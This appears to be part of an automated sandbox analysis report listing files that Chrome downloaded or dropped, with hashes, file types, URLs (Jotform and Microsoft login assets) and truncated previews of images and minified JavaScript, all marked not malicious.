                                                                                                                                                                                                                                            Preview:.PNG........IHDR....................PLTE....a......)..Q.......u ..............y)2g..Q................@...~0...... ...._..`..@..7......D.k.`............p...P.........p...................OW..#\..P......0..........em....9Ar..l:.}.....IDATx...n.@........q..z...zy..:....2.h.D....4.{waY.eY.eY.e....."....*.........mt.c.!../>8.y....z.&..y....#...%xr...z(...<T.......}^.@I{...*t..:D....fEP....*..DYzZ....{.Q...d..4....3J.P..=.0....O.=T.....y<O....y..2..R.)).x+e..2O.`.aOC.'l..`...*..H..ee.h.@..-e.,.y.T._.....<.[.<.IY..H.g.J..G.....p.....7...'.Z<...=Se..P....'.........5<.....z.:....T.....T<.S..."u..JfF...........h..P=...0=.[..=.9....PUH.s=T....,.<.7.4...]..&....^..y..|r..#.V.O.....xK..K..a..........9..D.......8...X.....y..".K....qDuy..G...qD5y..CT.......x... ...C.d..c...x.8.....#..{.8.@......=xJ.]._...n...qO.....H.........P.J..=..;u.=.H&..R.}....g[-...q..eY.eY.eY.A..dUC.A.......IEND.B`.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):3452
                                                                                                                                                                                                                                            Entropy (8bit):5.117912766689607
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:3qO9I9Sz9KHULI5m4UidBGLosqAsosushswsosry:a2IYz95qTdBac
                                                                                                                                                                                                                                            MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                                                                                                                                                                                            SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                                                                                                                                                                                            SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                                                                                                                                                                                            SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://login.live.com/Me.htm?v=3
                                                                                                                                                                                                                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 386 x 96, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):20775
                                                                                                                                                                                                                                            Entropy (8bit):7.966736106439244
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:KsBopDvLrAvNnqfkSx7GWQUViDP1LK8wkPWA67iUZZiwiKNXsRBaPH5BN87wL4WU:fXv2kSBnQUVQL/wkjOiUZZiwiWYI6IG
                                                                                                                                                                                                                                            MD5:E1F8E411137B59501B3240C5DB9AEAEB
                                                                                                                                                                                                                                            SHA1:0A5E09AFCA2CFDBD29F2D13F48BB78E1F375DF4A
                                                                                                                                                                                                                                            SHA-256:4269765C20D9014CF24C8CFC41B6EE3F08BD8B276366AB946F86B2C76BA0F466
                                                                                                                                                                                                                                            SHA-512:21FE4E7CD8CC1E3C2DA66D7037FA5D9F0C6D1A377EE04DCEC8253E9C5F1B532163882912917F7BE3A8F20BD3A0F8E6AD6C58C09F152CA6FFF5AA8B2776133C09
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/Screenshot%202025-01-10%20at%2002.51.26.678100df0e5de0.10817411.png?md5=My-OIzLTfKJ5W-I8bVcA3w&expires=1736510726
                                                                                                                                                                                                                                            Preview:.PNG........IHDR.......`.......u.....iCCPICC Profile..H....TS.....@....N.)!.P..`#$..!.@P.;.C.QD...A..G..X.`...v.D..q.`C.]`.f...z{...e.}...s../..M.D"...H.gI....1.q... ........L.+44. 6..n.z.\.nYN........L..P(...L^....'.f..:....fI&...*R.A..Mp......IF.'s"...3....\i..d.$...%!u..k...b.s.vOKK.#|.a.$G..D}f._.$..f..&..$.L..[.).q.....-M$......d.....=KM...8a^.4......,.f^&;n.3E.i.s...uD.9Q.+..fq".Y...>...0...R6k....d...x..#.....=...y..R..gr..T.&_.@..53..|..2..v!G.nVr..|..3......1....o...Hy.$.K>.D.*........p..Y..y7T..)..i.l..D....B.y..%X.5..v.d.T....`!.M...yV..[k[{.&....xG......L,......}).....p|...~31.Q.(.....d...z....@...u...........O...@....`1..d..t... ...M`+..;......G@+8....*........`.|.c... .D..!...2.l!&...@AP....CI...A..z..*....P=..t.:.]....P.4.....(....Z..<.f.,8.....Ip..........>...g.....~........tQ.(&...A..QR.*T!..U.jD..:Q.P..W..h,..f.-.h.t$...@.B......-...[.>...;....c\0.L.&.....)..a.1.0w0...X,..5.:a.......l1v;..{.....p8u.9......p..J.A.i.M..........}.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):42208
                                                                                                                                                                                                                                            Entropy (8bit):7.906706254721029
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:w56lFOj0iT989VdMOgPecEcoKfPTrCuVJAnoQjI:A/Yn9VdUvpfbeuUI
                                                                                                                                                                                                                                            MD5:18323C1298B0D1B93EF749682972E890
                                                                                                                                                                                                                                            SHA1:A38A9754A9435A90AFFD782690E4EEC7B3DF58B1
                                                                                                                                                                                                                                            SHA-256:A0FE0078C32DCDA4817B6261B939D995782876916069E313229915B76F6489BF
                                                                                                                                                                                                                                            SHA-512:C4FFE6C30F6172A76E828A40FE0A29F6CEC7A803AC637AE9B3C041AC3119BFC9902FAD6286BAD809CEE0ABA19AE66DDC9F197E94745F1FD55B45D09BC70810EF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://eu-files.jotform.com/jufs/Gittens_Murray/form_files/250092704521347_mainPWAIcon.678100e1e431c.png?md5=ryw-nPNnemSleOEGRmSPqA&expires=1736510726
                                                                                                                                                                                                                                            Preview:.PNG........IHDR..............x......sRGB....... .IDATx^..wTW...A9.$.I".`..........{7..n..6.16.I&. r.......(.U.S..}....JUg..Zs.=...._F....#`..@...a.....b...0.F.........0.F....."`...M.....0.F....X....0.F..d.....n..l....0.F...2`....0.F ....dp.d#`....0.&...#`....0..D.. ...%..#`....0.....#`..... .&...t/....#`.....e....#`..@..0...{.F....#`.L.,.F....#`.2...@.7.K6.F....#`.`.0.F....#.A.L.2..^..0.F........0.F....."`...M.....0.F....X....0.F..d.....n..l....0.F...2`....0.F ....dp.d#`....0.&...#`....0..D.. ...%..#`....0.....#`..... .&...t/....#`.....e....#`..@..0...{.F....#`.L.,.F....#`.2...@.7.K6.F....#`.`.0.F....#.A.L.2..^..0.F........0.F....."`...M.....0.F....X....0.F..d.....n..l....0.F...2`....0.F ....dp.d#`....0.&...#`....0..D.. ...%..#`....0.....#`..... .&...t/....#`.....e....#`..@..0...{.F....#`.L.,.F....#`.2...@.7.K6.F....#`.`.0.F....#.A.L.2..^..0.F........0.F....."`...M.....0.F....X....0.F..d.....n..l....0.F...2`....0.F ....dp.d#`....0.&...#`....0..D.. ...%..#`....0.....
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):188877
                                                                                                                                                                                                                                            Entropy (8bit):5.87011986087482
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3072:ak7V3HibH4BO0x7NKoAwWEttFjZBkOAOQ01mreYzdVy48xK34KbeeCo7MAcBNq:ak/OyKCt11hwdVy48o34KNBQNq
                                                                                                                                                                                                                                            MD5:DC7D4D348FE1F99AF4AC06D2A42B5088
                                                                                                                                                                                                                                            SHA1:65BB9F01723084A15404421BA1DB1895B968A0ED
                                                                                                                                                                                                                                            SHA-256:15B7CBC354E3B92301ACB88F9E8A95586A0B5A4444F1EDDAB0C8287A2B638CF7
                                                                                                                                                                                                                                            SHA-512:0B439413F57D1131C449B5BE533981B7FF252A4812B3A33B0787C1FE4C27C0A44C395ACC135985841C9980CB9AEFB6A27CDC677B6C04FF4864E06B4AE5CC8108
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:/*! For license information please see 4646.d3fc3085.js.LICENSE.txt */..!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="66243b25-ed31-5941-958c-2e958167edbd")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["4646"],{87868:function(e){!function(t){"use strict";function r(e,t){var r=(65535&e)+(65535&t);return(e>>16)+(t>>16)+(r>>16)<<16|65535&r}function n(e,t,n,i,s,o){return r((a=r(r(t,e),r(i,o)))<<(c=s)|a>>>32-c,n);var a,c}function i(e,t,r,i,s,o,a){return n(t&r|~t&i,e,t,s,o,a)}function s(e,t,r,i,s,o,a){return n(t&i|r&~i,e,t,s,o,a)}function o(e,t,r,i,s,o,a){return n(t^r^i,e,t,s,o,a)}function a(e,t,r,i,s,o,a){return n(r^(t|~i),e,t,s,o,a)}function c(e,t){var n,c,l,u,h;e[t>>5]|=128<<t%32,e[14+(t+64>>>9<<4)]=t;var p=1732584193,d=-271733879,f=-1732584194,m=2717
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (2951)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):14002
                                                                                                                                                                                                                                            Entropy (8bit):5.446123162847081
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:ftmazZqvBoJb/+GtXrZDGU7G4Mf5MGVFMZF5HDEZISC8oTzEiwlbcWGMy/b1GFsD:hzZqZWb1DGU7fMe6iV2oTz6gWGMyR2qf
                                                                                                                                                                                                                                            MD5:D8C63B3B9AC17B2D232A631AB5EC2054
                                                                                                                                                                                                                                            SHA1:946AB0525E2D309588B1683D24EB99B390D6EA48
                                                                                                                                                                                                                                            SHA-256:DFE7A2AC253412B22B4570A1F9A94F46E1035CA97A014FFFC7962FA2CE485DC2
                                                                                                                                                                                                                                            SHA-512:6498E5ECAF77DF65767930B115E49E62BB53B36F55BF42E2465DC2D7120EAE00045EC24348097400117228531D7019D1ACF5EE407D34C82CD13BF65ADA7FE7C3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Preview:<!doctype html>.<html lang="en-US">. <head>. <meta charset="utf-8">. <meta name="robots" content="noindex,nofollow">. <meta http-equiv="X-UA-Compatible" content="IE=edge">. <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=5">. <link rel='alternate' type='application/json+oembed' href='https://www.jotform.com/oembed/?format=json&url=https%3A%2F%2Fwww.jotform.com%2Fapp%2F250092704521347' /><link rel='alternate' type='text/xml+oembed' href='https://www.jotform.com/oembed/?format=xml&url=https%3A%2F%2Fwww.jotform.com%2Fapp%2F250092704521347' /> <link rel="preload" href="https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Book.woff2" as="font" crossorigin="anonymous" />. <link rel="preload" href="https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Medium.woff2" as="font" crossorigin="anonymous" />. <link rel="preload" href="https://cdn.jotfor.ms/fonts/circular/fonts/Circular-Bold.woff2" as="font" crossorigin="anonymous"
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65199)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):624979
                                                                                                                                                                                                                                            Entropy (8bit):5.390107921761244
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:MEdlVbHnCefgao+uJT0IVpJMLUSKh0LSkHCTSuji/Bdpyk4gmTvi2:MyTSa1uXSVSkHCTSDcJ62
                                                                                                                                                                                                                                            MD5:7BF05F15E88CA1A7A9D1060E2FEED54F
                                                                                                                                                                                                                                            SHA1:0323E4D905D6CBF1B24D031AE2D24F0AA36C1889
                                                                                                                                                                                                                                            SHA-256:F9D2EE7B493FF91D5CBDC8CEE03B989C51A27D0DF4993705AFA9E3D9700447F9
                                                                                                                                                                                                                                            SHA-512:7AC98CD876B6FA9B9073CDD9327D8FF0176CACE15A3D092FA88DD2E7EB9CF7C66D321ED5851BD5FF6B7733ACE11D04E06D93D5A37C44DB297426C9D07B6C8E92
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:/*! For license information please see 5241.1f05701c.js.LICENSE.txt */..!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2acd20d3-1b12-5ce4-947c-4c81a5a1edd0")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["5241"],{34766:function(e){e.exports=function(){"use strict";function e(e){var t=new d,r=Array.from(e);if(!r.every((function(e){return!Number.isNaN(e)})))throw TypeError('CSSMatrix: "'+e+'" must only have numbers.');if(16===r.length){var n=r[0],a=r[1],i=r[2],o=r[3],s=r[4],l=r[5],u=r[6],c=r[7],f=r[8],h=r[9],p=r[10],v=r[11],y=r[12],m=r[13],g=r[14],b=r[15];t.m11=n,t.a=n,t.m21=s,t.c=s,t.m31=f,t.m41=y,t.e=y,t.m12=a,t.b=a,t.m22=l,t.d=l,t.m32=h,t.m42=m,t.f=m,t.m13=i,t.m23=u,t.m33=p,t.m43=g,t.m14=o,t.m24=c,t.m34=v,t.m44=b}else{if(6!==r.length)throw new TypeE
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):61052
                                                                                                                                                                                                                                            Entropy (8bit):7.996159932827634
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:1536:HQaq1Q7XOos5ZBIp+1Zr52IGmCJijm1qAxTe9wzf:fq1HoUBIpU5TG7JSmwuTe+b
                                                                                                                                                                                                                                            MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                                                                                                                                                                                                            SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                                                                                                                                                                                                            SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                                                                                                                                                                                                            SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3651
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):1435
                                                                                                                                                                                                                                            Entropy (8bit):7.8613342322590265
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:XjtSZi0kq+yVCGYXVrO4vDxik/N/z5VaLPbholJvf6dblke68eRZJyBDz3BnZcNX:XgDkpyVCGca4b//9z5oPXdbl9688qRzY
                                                                                                                                                                                                                                            MD5:9F368BC4580FED907775F31C6B26D6CF
                                                                                                                                                                                                                                            SHA1:E393A40B3E337F43057EEE3DE189F197AB056451
                                                                                                                                                                                                                                            SHA-256:7ECBBA946C099539C3D9C03F4B6804958900E5B90D48336EEA7E5A2ED050FA36
                                                                                                                                                                                                                                            SHA-512:0023B04D1EEC26719363AED57C95C1A91244C5AFF0BB53091938798FB16E230680E1F972D166B633C1D2B314B34FE0B9D7C18442410DB7DD6024E279AAFD61B0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg
                                                                                                                                                                                                                                            Preview:...........WMo.7..+..uV.HJ...{..........&..v...(Q.F.....aW.Q.|..~.|{~...b{8...zv.....8|...b.gxb.y{.x<\lS...p...p..l7...o.}.v.....t.........r..r.|9?.......HP...r.4.aGA.j....7.!....K.n.B.Z.C.]....kj..A..p...xI...b..I!K..><.B..O....#...$.]h.bU.;.Y...).r.u....g*.-w.2..vPh....q....4_..N\..@y).t{.2pj.f..4h.....NC.....x.R..P..9.....".4.`%N..&...a.@.......fS)A4.F..8e9KHE....8d.CR.K..g..Q.......a....f.....dg*N.N.k..#w..........,.".%..I.q.Y.R]..7.!.:.Ux...T.qI..{..,b..2..B...Bh...[o..[4....dZ.z.!.l....E.9$..Y.'...M.,p..$..8Ns3.B.....{.....H..Se3....%.Ly...VP{.Bh.D.+....p..(..`....t....U.e....2......j...%..0.f<...q...B.k..N....03...8....l.....bS...vh..8..Q..LWXW..C.......3..Pr.V.l...^=VX\,d9f.Y;1!w.d,.qvs....f*;.....Zhrr.,.U....6.Y....+Zd.*R...but....".....4.L...z........L.Q......)....,.].Y.&....*ZsIVG.^...#...e..r....Z..F..c..... .QDCmV..1.~...J9..b_Oov\..X.R..._.TqH.q.5G.0{ZphQ..k...s..\.../.Dp..d`#......8.#Y...Mb.j.Q......=n4.c....p.[.SI.....0.N.
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):116345
                                                                                                                                                                                                                                            Entropy (8bit):7.997378915283506
                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                            SSDEEP:3072:svJ27JKT4KNXDBEeFUNHE/7SVxX7RLTMMqfC4:L7KPDBEeF2HE+J5AMqfC4
                                                                                                                                                                                                                                            MD5:7570EB58C2BCE45B24EA431EB15D27B5
                                                                                                                                                                                                                                            SHA1:0DE0A6616E6BF7B045CFC456E4E3DF6760617CFA
                                                                                                                                                                                                                                            SHA-256:5AEE6747482DFC52A669CAED6BE1B9319536AC9514C2D7354B879F093ABB212A
                                                                                                                                                                                                                                            SHA-512:696D4C3765DA2936461D15C89A41F98EDED30F202C422143D921D6096D7DD6456479F48B1065398323F7DFE60B5D3452B0C3C67DD01EE041E51CFBCA9125D86D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_510f960da65b56e0607c.js
                                                                                                                                                                                                                                            Preview:...........k{.H.(.}............'qz<..>.3==..G..(..../m..]kU.T......|x....T.Z...O....T.........e..]../'.o+gp.k.........F....+#..+.{..|X..J.U.`.F.0...W..7.Ie...J2.Y.~.$.L.8....$...P]4..yQ.P99..P?....?........I%....+^0..&p..2..<........Da...J....F.9<.7.*^.+1O*.0J..........h1....[....h..............u".....C%.+..\.>....T`.1....... i......8.TB(.Uh.b.{...@<y..D^.S.....n".<H.L..O..*.t........p6..\[...yCm.J.k.....b..vg....-.j.$........1....p~3.b.....n....[_c..{1WN.l~.=...........?......S.}U..g.......t..../...........|.+...-y.X\...l.....>;."....ye.\.....h..p.f.8...[/..nd.,..O.b>.6-......c7.}.yp.c5.R6p..E...z3.......y7.d.M..K...n.h...OX.&..d.[/...ng.S.Ae..D<.GAe..&.^7......'..b...#..X..q....O.~W.M3.+b..m.>&^t.O..I.LU.;..a....&.k.$...{.{.^.....3OX.Oy8O...f.%..o..]..9....Ln-...'.....A.3y..v=l....G......i..../...--k...p..m..Y........XV...i.......;.o..zyc@..MLoy.b_.,.....5..w=..#.^..M.P.'<_.j...m..|......0...w../...>\...l.>.....h...q>.w...ZM[...
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (8170), with no line terminators
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):8170
                                                                                                                                                                                                                                            Entropy (8bit):5.135398350416187
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:bFneccu9mfg6wn5wJW6AaY8da6NK5+JKL:b5eccu9mfjlh5dE5L
                                                                                                                                                                                                                                            MD5:5A464EA3EBB900946EBF2300E67D3BC5
                                                                                                                                                                                                                                            SHA1:E139ACFF3E118A45796D9278B71AAB9BD8DB7D66
                                                                                                                                                                                                                                            SHA-256:C1F506C3D04D913097AF318728C8AB36D27AD384B4870FB03ADE9D7A9D1E765A
                                                                                                                                                                                                                                            SHA-512:A522882F35B4D2FAA8E6230CE000483717A075E4E1A9702202C6B146A8CDF344685DD3496D338FCAA14AD5AB26FFA3783D7C4CA7B10279C79B476EC968CF4D7B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn03.jotfor.ms/s/portal/674ac14411e/static/css/DocumentPreview.6d5451e5.chunk.css
                                                                                                                                                                                                                                            Preview:.preview-orange-500{color:#ff6100}.preview-yellow-400{color:#ffb629}.preview-yellow-600{color:#f49200}.preview-green-500{color:#64b200}.preview-blue-500{color:#0078e8}.preview-blue-600{color:#0066c3}.preview-purple-500{color:#892dca}.preview-red-500{color:#c90909}.preview-navy-500{color:#343c6a}.filePreviewHolder:not(.forThumbnail){width:32px;max-width:100%}.filePreviewHolder:not(.forThumbnail) .fileType{padding:2px;font-size:10px}.filePreviewHolder{position:relative}.filePreviewHolder svg{display:block}.filePreviewHolder .fileType{text-align:center;color:#fff;border-radius:3px;justify-content:center;align-items:center;width:70%;font-weight:700;display:flex;position:absolute;bottom:10%;left:15%}.jPreview-footerContainer .jPreview-thumbnail .filePreviewHolder:not(.forThumbnail){width:44px}.preview-hidden{display:none!important}.jPreview{z-index:1004;background:rgba(0,0,0,.9);width:100%;padding:10px;animation-name:appear;animation-duration:.7s;animation-direction:alternate;animation-fill
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65254)
                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                            Size (bytes):83118
                                                                                                                                                                                                                                            Entropy (8bit):5.637242220528819
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:zfWsJ38ceP5xO3ritKs51gwe3qThU2Si/gE9:zlV8ce67iJo3qVRoE9
                                                                                                                                                                                                                                            MD5:5D9CC235352BD4D92C0DB3A0D6DBCF45
                                                                                                                                                                                                                                            SHA1:19B9ED063298D045A52F9B094CE8E58615B30C2F
                                                                                                                                                                                                                                            SHA-256:362E3E6B4A895CA6E0CBABE8F347D10811E59AEA6C82193ED50E6BD98A564B2B
                                                                                                                                                                                                                                            SHA-512:700DDD8752BB3362B09AFE872CF30C0DD249E86C6774248144B959B037BB0C93ED37CE15C5FF3AB36523BAC64F8E2B9970E81A1204692A37B209E828A9C3BDA2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            URL:https://cdn03.jotfor.ms/s/portal/674ac14411e/static/js/6354.52cd18d8.js
                                                                                                                                                                                                                                            Preview:"use strict";.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="e7c7d559-42e9-55b4-adc2-3817e7485f0b")}catch(e){}}();.(("undefined"==typeof self?this:self).chunkList=("undefined"==typeof self?this:self).chunkList||[]).push([["6354"],{15373:function(e,t,n){n.d(t,{Z:function(){return gn}});var i=n("20366"),s=n("94653"),o=n("37897"),a=n("11268"),r=n.n(a),l=n("32358"),c=n("58935"),d=n("50728"),u=n("57665"),p=n("65301");const m={LOGIN_FLOW:"loginFlow",ACCOUNT_SETTINGS:"accountSettings"},g={TOTAL_SUBMISSONS:"totalSubmissions",PAYMENTS:"payments",FORMS:"formCount",AI_AGENTS:"aiAgents",AI_CONVERSATIONS:"aiConversations",SIGNED_DOCUMENTS:"signedDocuments",WORKFLOW_RUNS:"workflowRuns",SUBMISSONS:"submissions",UPLOAD_SPACE:"uploads",FORM_VIEWS:"views"},h="total_submissions",v="payments",_="form_count",C="ai_agents",A="ai_conversations",E=
                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (59987)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):60031
                                                                                                                                                                                                                                            Entropy (8bit):5.370598287940797
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:1536:JYwYaYquvZBZtBS7FzHDGEu2A5t2D/lCt:WVDjTnBS5zHDEa4t
                                                                                                                                                                                                                                            MD5:700E9FCA74FA92077675421461929668
                                                                                                                                                                                                                                            SHA1:BE066A0B6073EB5174C0B2B8938163D3B37428FA
                                                                                                                                                                                                                                            SHA-256:8A5142932F28D4A6FAF0DD2BBB977415E96A4A59F06C7429473856F3E74F592C
                                                                                                                                                                                                                                            SHA-512:016C70A6D59B517C475098D543DCC90A9CA588BEBAD472931496EFE2341385A2CCE774EA5FD71841D0E472CED30386AB6EF913E132F3C7B910E3F3007FB8C19E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Reputation:low
